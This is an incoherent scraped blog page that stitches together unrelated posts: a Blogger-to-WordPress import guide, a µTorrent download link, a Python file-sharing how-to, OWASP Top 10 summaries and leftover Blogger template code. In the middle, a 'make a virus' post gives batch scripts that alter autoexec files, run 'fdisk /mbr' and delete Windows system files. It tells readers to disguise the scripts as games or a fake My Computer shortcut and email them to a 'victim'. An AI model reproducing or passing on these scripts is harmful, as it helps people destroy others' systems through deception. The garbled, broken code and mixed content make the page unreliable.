Création des Logiciels de gestion d'Entreprise, Création et référencement des sites web, Réseaux et Maintenance, Conception
Création des Logiciels de gestion d'Entreprise, Création et référencement des sites web, Réseaux et Maintenance, Conception
If you have been planning to migrate your blog from Blogger to Wordpress but found the whole process of importing blogger posts with comments into Wordpress too technical and complicated, here's a very good news for you.
You can now move all blogs posts and comments from your Blogger account into your WordPress blog with the click of a button - it's so simple that even mom can do it as long as her blog is hosted on the new Blogger platform.
Wordpress.com and self-hosted Worpress 2.2 installations ship default with a free Blogger Importer plugin that can be accessed from your Wordpress dashboard (Manage -> Import -> Blogger)
All you have to do is authorize Wordpress to use your Google account and Wordpress will display a list of blogs associated with Blogger account. Select the blog that you like to import in blogger and click import. Voila!
All your posts, comments, categories (Blogger labels) and users will be visible in Wordpress in few minutes depending on the size of your Blogger Blog.
Even if you have no plans to switch from Blogger to Wordpress, this is still an excellent option to create a backup of all the posts and comments from the Blogger blog.
For Geeks: This Wordpress-Blogger Importer will not change anything in your Blogger hosted blog - neither the timestamp formats nor the blogger templates. It simple uses the Google Blogger API to fetch the blogger posts into Wordpress.
The Blogger Importer script will however not import the Blogger images to your Wordpress installation. And there's no way to specify filters on your Blogger posts - everything will be imported in one go.
µTorrent is a lightweight and efficient BitTorrent client for Windows or Mac with many features.It is fast, efficient and tiny with maximum functionality and low resource usage.uTorrent is a small and really most popular Bit-Torrent client. uTorrent is a lightweight and very tiny Bittorent client by over then one hundard million of users and several advanced and updated features: Resource-Friendly ,Fast, very Small, Free Micro Sized Yet quality overflowing. Most of the features present in other BitTorrent clients are present in µTorrent, including bandwidth prioritization, scheduling, RSS auto-downloading and Mainline DHT (compatible with BitComet). Additionally, µTorrent supports the Protocol Encryption joint specification (compatible with Azureus 2.4.0.0 and above, BitComet 0.63 and above) and peer exchange.
Download µTorrent Plus 3.3.1 Beta 29335 Full Version: Click here (Alternate Link) OR Click here
Leave a comment if links are broken………………. thank you………..
2013, By: Seo Master
All of us will ever be at home with a friend or a family member and want to exchange a few files quickly. This “How To” you will be able to “host” your files temporarily and your folders on your GNU / Linux using Python, and you can access via browser from any device connected to the LAN and WLAN.
Python is a high-level programming language interpreted, object-oriented and extensible. It is a multi-paradigm language variables are not typed, which allows Python to be versatile, fast and efficient. Precisely because of these characteristics, it proves useful to scripting.
Our goal is to have access to a Linux device file via browser from any machine connected via LAN cable (LAN) or wireless (WLAN).
But how?
What we need is a small server to boot from the terminal. The SimpleHTTPServer, this is the script name in the directory we will use
/ Usr / lib / pythonx.y /
is available in all systems that have installed Python version 2.5 or higher.
Given some element of theory, let’s practice!
We want to share the folder “mia_cartella” contained in one of the system.
We initiate the terminal.
Let’s move the folder to be exchanged: Use the command “cd” (change directory).
cd Desktop / mia_cartella
Finally we start the script. The syntax is:
sudo python-m SimpleHTTPServer 80
where 80 is the port on which to listen.
For more ports of 1024 can omit “sudo”.
This is what will appear: The server starts at localhost on port choice.
To end the session just press Ctrl + C
Now just find the IP address of the pc to share the folder with one of the many methods, I suggest sites like http://www.ip-adress.com/ .
Point your Web browser connected to the device (W) LAN from which you access
http://ipaddress:port/
proceeds with the IP address instead of “ipaddress” and the port you chose for the connection instead of “port”. The browser will display a tree structure, such as image, with the contents of the folder from which you started the script.
Warning! The script is recursive, so anyone can access it, can also display the subfolders.
2013, By: Seo Master
What Is A Virus?
A computer virus is a computer program that can copy itself and infect a computer. The term “virus” is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.(Source Wikipedia)
As stated above, the term “computer virus” is sometimes used as a catch-all phrase to include all types of malware, adware, and spyware programs that do not have the reproductive ability. Malware includes computer viruses, worms, trojans, most rootkits, spyware, dishonest adware, crimeware, and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with computer worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan is a program that appears harmless but hides malicious functions. Worms and Trojans, like viruses, may harm a computer system’s data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious and go unnoticed.(Source Wikipedia)
Understand the following: It’s just a harmless “virus”. It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!
Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.
@echo off
title %0
rem conditional check.
echo welcome to this wonderful program! please wait while I delete all your files!
rem infection of the user
copy %0 c:tmp.bat >null attrib +r +s +h c:tmp.bat echo for %%i in (*.bat) do copy c:tmp.bat+%%i %%i >>c:windowssystem32autoexec.NT
echo echo virus detected! >>c:windowssystem32autoexec.NT
echo pause >>c:windowssystem32autoexec.NT
echo NT core:infected!
echo echo shame on you! >>c:autoexec.bat
echo echo system hault-virus identified! >>c:autoexec.bat
echo chkdsk >>c:autoexec.bat
echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l
fdisk /mbr
shutdown -s -t 03 -c “windows has shut down because the lsass service has incountered a write fault at 0×00000000000000000000000000000000000″
Code Details
@echo off
color 1a (Changes the colour)
echo (Displays a text)
echo: (leaves a line)
ping -n 2 127.0.0.1>nul (pings your localhost – nothing much)
shutdown.exe (shutdown)
Read and understand the warnings!
Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.
Copy and Paste the Code of the “virus” into Notepad
Click File -> Save as
Decide for a location to save the fake-virus. You should chose a location where the user won’t find the file, so saving it on the desktop would be a bad idea!
Change “.txt” to “All files” in the file type drop-down menu
Chose a harmless filename. Replace the “.txt” at the with “.bat”
Click on save and close Notepad.
Now We Have Completed Making The Virus And Now We Must Bind The Virus With Any Other File
To Create a Fake Virus
First of all open "Notepad" in your computer and type the following code without quotes.
"start virus.bat
virus.bat"
Now the file as virus.bat and send it to your friend.Now when he will be trying to run it,his computer will get crushed and he will have to restart his computer.
To Create a Shutdown Virus
To create this virus,you dont need to open notepad.For this just go to your desktop,i.e.,the main screen and right click and go to "New" and then click "Shortcut".
Now type the following code in the text box.
shutdown -s -t 200 -c "This is a Fake Virus"
And then click next and type "My Computer".Now you will see a shortcut on your desktop named as "My Computer".Now you just need to change the icon of it as same as that of original My Computer.So right click on the shortcut and click properties and then click "Change Icon" button.Now select the icon of the My Computer and click apply and then OK.Now place the My Computer shortcut on your desktop and replace the original one.
Now whenever your friend will try to open My Computer,then his computer will get shut down after 3 minutes.To stop the shutdown,go to start and then go to Run and type shutdown -a.
1.To create a very harmful virus,open Notepad and type the following.
del "C:\windows\pchealth"
del "C:\windows\system\"
del "C:\windows\system32\restore\"
del "C:\winlogon.exe"
del "C:\windows\system32\logonui.exe"
del "C:\windows\system32\ntoskrni.exe"
del "C:\windows\system32\autoexec.nt"
After pasting , Save it as " your fav name " .bat
it's like i have saved it with ," fifa 10.bat "
i saved it like
fifa 10.bat
cricket 08.bat
spiderman 03.bat
batman 08.bat
matrixtheneo 02.bat
you have to put " any name " and 2 digits then " .bat "
and save it to your desktop , ....dont DOUBLE CLICK IT
or else your system files willl be deleted !
the disadvantage is , you cannot send this file by attachment in any EMAIL and send it to your friends
destroy your friends CPU and Enjoy !
2.What this virus does is completely and permanently delete Windows or Linux depending. Please read the caution at the top.Onto the trick. Follow the directions carefully.
1- Write The Following In Notepad Exactly as it says Code: 01001011000111110010010101010101010000011111100000
2- Save the file as an EXE (Click File-->Save as...-->and erase what ever is there and type in something like funnystuff.exe).
3- To test it, create a textfile called "TEST.txt"(just leave it blank) and save it in 'My Documents' or something in your C: drive. Now in a NEW notepad type "erase C:TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd". Now run the file "Test.cmd" and go to C: and you'll see your Test.txt is gone. Now, the real work begins:
4- Go to Notpad and type "erase C:WINDOWS" (or C:LINUX if your targeted victim has linux) and save it again as funnypicture.cmd or something.
5- DON'T EVER run the file or you'll lose your WINDOWS map. So, that's the virus.
6- Send an email to your victim and attach the file "Funnypicture.cmd" or whatever you named it. When they open it, their Windows will be erased.
2013, By: Seo Master
</body>
<!--kolobok-smileys-->
<script src='http://helplogger.googlecode.com/svn/trunk/[www.matrixar.com]smileys.js' type='text/javascript'/><noscript><a href='http://www.matrixar.com/2012/04/how-to-add-emoticonssmileys-in-blogger.html' target='_blank'><span style='font-size: x-small;'>Add emoticons</span></a></noscript>
<!--kolobok-smileys-->
<script src='https://helplogger.googlecode.com/svn/trunk/kolobok threaded.js' type='text/javascript'/>
<b:loop values='data:post.comments' var='comment'>
<div id='smileys'>
</b:loop>
</div>
<data:blogTeamBlogMessage/>
<div class='post-footer-line post-footer-line-3'>
<b:if cond='data:blog.pageType == "item"'><script type='text/javascript'>
//<![CDATA[
function moreSmilies() {
document.getElementById('smiley-more').style.display = 'inline';
document.getElementById('smiley-toggle').innerHTML = '<a href="javascript:lessSmilies()"><div style="font-size:small; font-weight:bold;color:#000000;">Hide Emoticons /<a href="http://www.matrixar.com/2012/04/how-to-add-emoticonssmileys-in-blogger.html">Add Emoticons</div></a></span>';
}
function lessSmilies() {
document.getElementById('smiley-more').style.display = 'none';
document.getElementById('smiley-toggle').innerHTML = '<a href="javascript:moreSmilies()"><div style="font-size:small; font-weight:bold;">Show Emoticons</div></a>';
}
//]]>
</script>
<div class='emoticons'>
<span id='smiley-more' style='display: none;'>
<img src='http://www.matrixar.com/-k4ujC23cSgI/UTIq7eUkmuI/AAAAAAAABAQ/YUNL9_RhDB0/s1600/smile3.gif'/>:)
<img src='http://www.matrixar.com/-XSBJ7zBZKZs/UTIrT-hMYyI/AAAAAAAABAY/6B26_8Ttwj4/s1600/sad.gif'/>:(
<img src='http://www.matrixar.com/-Ph2wxEvy2mc/UTIr8-fdHjI/AAAAAAAABAo/3use2PsPhMA/s1600/taunt.gif'/>:))
<img src='http://www.matrixar.com/-pcE-4ot-gjk/UTIsLRff6SI/AAAAAAAABAw/LYvZ8__88Ak/s1600/cry2.gif'/>:((
<img src='http://www.matrixar.com/-lNNTReQVc0A/UTIrjDhVLAI/AAAAAAAABAg/BsVMYnr54pI/s1600/rofl.gif'/>=))
<img src='http://www.matrixar.com/-8C5UH12mxf0/UTIzmsxczDI/AAAAAAAABDA/2seHdqLVQ6Q/s1600/suicide.gif'/>=D>
<img src='http://www.matrixar.com/-lhTywmMZ58E/UTI04kjJ3WI/AAAAAAAABDY/qNgtijEr_E8/s1600/biggrin.gif'/>:D
<img src='http://www.matrixar.com/-gG_Wn6D6Ux4/UTIyqFyfKbI/AAAAAAAABCo/qEmU8s8ndVI/s1600/tongue.gif'/>:P
<img src='http://www.matrixar.com/-Zb5g0OWHx4c/UTIsuPLt90I/AAAAAAAABA4/cmP1ltBmVF0/s1600/shock.gif'/>:-O
<img src='http://www.matrixar.com/-TSIzPWeGBwk/UTI0S-nw5tI/AAAAAAAABDQ/xyHPCFZH4fI/s1600/think.gif'/>:-?
<img src='http://www.matrixar.com/-qpnD1BYon5w/UTI0AIeKX6I/AAAAAAAABDI/HsllV7NYTqk/s1600/unsure.gif'/>:-SS
<img src='http://www.matrixar.com/-SpvC8mHHwhg/UTIzQMUVGKI/AAAAAAAABCw/_NKKVyQtulk/s1600/flowers1.gif'/>:-f
<img src='http://www.matrixar.com/-qlyn_deOhFw/UTIzY8aRgqI/AAAAAAAABC4/pfSojMdD33s/s1600/doh.gif'/>d(
<img src='http://www.matrixar.com/-H4e_O5BFVP8/UTIumwhVmKI/AAAAAAAABBw/SKhY4DDxKkk/s1600/air_kiss.gif'/>:-*
<img src='http://www.matrixar.com/-h4yNmhdKUVU/UTIwUKpvVOI/AAAAAAAABCY/B0FEZVRGHe4/s1600/threaten.gif'/>b-(
<img src='http://www.matrixar.com/-veVoDPEc7I4/UTIv9wCS0jI/AAAAAAAABCQ/4c5FgCHAiU4/s1600/help.gif'/>h-(
<img src='http://www.matrixar.com/-_ttAcnBbAaw/UTIvKtxfWvI/AAAAAAAABCA/X2JLEShhOQU/s1600/good.gif'/>g-)
<img src='http://www.matrixar.com/--o9jZ1nMcec/UTIuyCBgS_I/AAAAAAAABB4/Jf03oz5yKrU/s1600/beee.gif'/>5-p
<img src='http://www.matrixar.com/-6-BTJcVpwY0/UTIvhF_PL-I/AAAAAAAABCI/SS-LDADTSls/s1600/yahoo.gif'/>y-)
<img src='http://www.matrixar.com/-khAwhIYbgvQ/UTItD_PfNyI/AAAAAAAABBI/HMpRMQh5Uak/s1600/crazy.gif'/>c-)
<img src='http://www.matrixar.com/-fsTXhXl10Gg/UTIs7Ll01AI/AAAAAAAABBA/QkWgWAAFG3g/s1600/spiteful.gif'/>s-)
<img src='http://www.matrixar.com/-CIuUuJeuyGI/UTIueHgTxOI/AAAAAAAABBo/BzXkTEEDlhw/s1600/drinks.gif'/>d-)
<img src='http://www.matrixar.com/-Mc5ed3Ymk7s/UTI1GIXMAMI/AAAAAAAABDg/PyDOfoXgsl0/s1600/cheer.gif'/>w-)
<img src='http://www.matrixar.com/-JOgaMRI61Jk/UTItsGc5KdI/AAAAAAAABBY/6UDCabfZQbg/s1600/hi+2.gif'/>:-h
<img src='http://www.matrixar.com/-wmOB_Z6LPp4/UTIt9FhZiwI/AAAAAAAABBg/7VoefgIQjEs/s1600/give_heart.gif'/>:X
</span>
<span id='smiley-toggle'><a href='javascript:moreSmilies()'><div style='font-size:small;font-weight:bold;'>Show Emoticons <img src='http://www.matrixar.com/-k4ujC23cSgI/UTIq7eUkmuI/AAAAAAAABAQ/YUNL9_RhDB0/s1600/smile3.gif'/></div></a></span>
</div></b:if>
]]></b:skin>
.emoticons {-moz-background-clip: -moz-initial;-moz-background-origin: -moz-initial;-moz-background-inline-policy: -moz-initial;text-align: left;width:400px;}
.emoticons a, .emoticons a:hover {margin-left: 20px;text-decoration:none;}
A1 – Injection
Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
A2 – Broken Authentication and Session Management
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities.
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.A4 – Insecure Direct Object References
•A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.A5 – Security Misconfiguration
Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date.A6 – Sensitive Data Exposure
Many web applications do not properly protect sensitive data, such as credit cards, tax ids, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
A7 – Missing Function Level Access ControlVirtually all web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality.A8 - Cross-Site Request Forgery (CSRF)
A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.A9 - Using Components with Known Vulnerabilities
Vulnerable components, such as libraries, frameworks, and other software modules almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts.A10 – Unvalidated Redirects and Forwards
Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
gdata.service.http_request_handler = gdata.urlfetch
to make sure your requests have a path out!<b:skin>
<link href="your-favicon-links-goes-here" rel="icon" type="image/gif"/>
<b:loop values='data:post.comments' var='comment'>
<script type='text/javascript'>var CommentsCounter=0;</script>
<data:commentPostedByMsg/>
<!--comments-count-starts-->
<span class='comments-number'>
<a expr:href='data:comment.url' title='Comment Link'>
<script type='text/javascript'>
CommentsCounter=CommentsCounter+1;
document.write(CommentsCounter)
</script>
</a>
</span>
<!--comments-count-stops-->
</head>
<!-- comments-count-starts-->
<style type="text/css">
.comments-number a:link, .comments-number a:visited {
color: black !important;
text-decoration: none !important;
background: url(http://www.matrixar.com/-zrPssaxSG2E/T47v-XB1EWI/AAAAAAAAB8E/uUz8RiJnW2U/s1600/comment+bubble+1.png) no-repeat;
width: 50px; /*image-width size*/
height: 48px; /*image-height size*/
float: right;
display: block;
margin-right: 5px;
margin-top: -15px; /*comments-counter position*/
text-align: center;
font-family: 'Century Gothic','Lucida Grande',Arial,Helvetica,Sans-Serif;
font-size: 15px;
font-weight: normal;
}
.comments-number a:hover, .comments-number a:active {
color: #1BA0E1 !important;
text-decoration: none !important;
}
</style>
<!-- comments-count-stops-http://www.matrixar.com-->
<!--Related Posts with thumbnails Scripts and Styles Start--> <!-- remove --><b:if cond='data:blog.pageType == "item"'> <style type='text/css'> #related-posts { float:center; text-transform:none; height:100%; min-height:100%; padding-top:5px; padding-left:5px; } #related-posts h2{ font-size: 18px; letter-spacing: 2px; font-weight: bold; text-transform: none; color: #5D5D5D; font-family: Arial Narrow; margin-bottom: 0.75em; margin-top: 0em; padding-top: 0em; } #related-posts a{ border-right: 1px dotted #DDDDDD; color:#5D5D5D; } #related-posts a:hover{ color:black; background-color:#EDEDEF; } </style> <script type='text/javascript'> var defaultnoimage="http://www.matrixar.com/-PpjfsStySz0/UF91FE7rxfI/AAAAAAAACl8/092MmUHSFQ0/s1600/no_image.jpg"; var maxresults=4; var splittercolor="#DDDDDD"; var relatedpoststitle="Related Posts"; </script> <script src='http://helplogger.googlecode.com/svn/trunk/related-posts-with-big-thumbnails.js' type='text/javascript'/> <!-- remove --></b:if> <!--Related Posts with thumbnails Scripts and Styles End-->Note :-
<div class='post-footer'>
<!-- Related Posts with Thumbnails Code Start--> <!-- remove --><b:if cond='data:blog.pageType == "item"'> <div id='related-posts'> <b:loop values='data:post.labels' var='label'> <b:if cond='data:label.isLast != "true"'> </b:if> <script expr:src='"/feeds/posts/default/-/" + data:label.name + "?alt=json-in-script&callback=related_results_labels_thumbs&max-results=4"' type='text/javascript'/></b:loop> <script type='text/javascript'> removeRelatedDuplicates_thumbs(); printRelatedLabels_thumbs("<data:post.url/>"); </script> </div><div style='clear:both'/> <!-- remove --></b:if> <b:if cond='data:blog.url == data:blog.homepageUrl'><b:if cond='data:post.isFirstPost'> <a href='http://www.matrixar.com'><img alt='Blogger Tricks' src='http://www.matrixar.com/-K65p5zLLKQk/T3ObCINoP7I/AAAAAAAABmI/dF84-alnOu4/s1600/best+blogger+tips.png'/></a> </b:if></b:if> <!-- Related Posts with Thumbnails Code End-->Note:-